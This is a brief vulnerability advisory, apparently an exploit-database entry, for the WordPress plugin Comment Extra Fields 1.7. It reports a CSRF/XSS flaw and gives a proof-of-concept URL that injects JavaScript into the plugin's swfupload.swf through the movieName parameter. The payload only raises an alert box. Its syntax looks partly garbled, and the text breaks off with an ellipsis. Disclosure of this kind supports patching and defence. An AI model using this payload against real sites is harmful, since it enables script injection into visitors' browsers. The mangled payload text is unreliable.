WordPress Comment Extra Fields 1.7 CSRF / XSS

Description : Wordpress Plugins - Comment Extra Fields XSRF/XSS Injection : http://site/wordpress/wp-content/plugins/comment-extra-field/scripts/swfupload.swf?movieName=";catcheif!self.aself.a=!alert'XSS';//...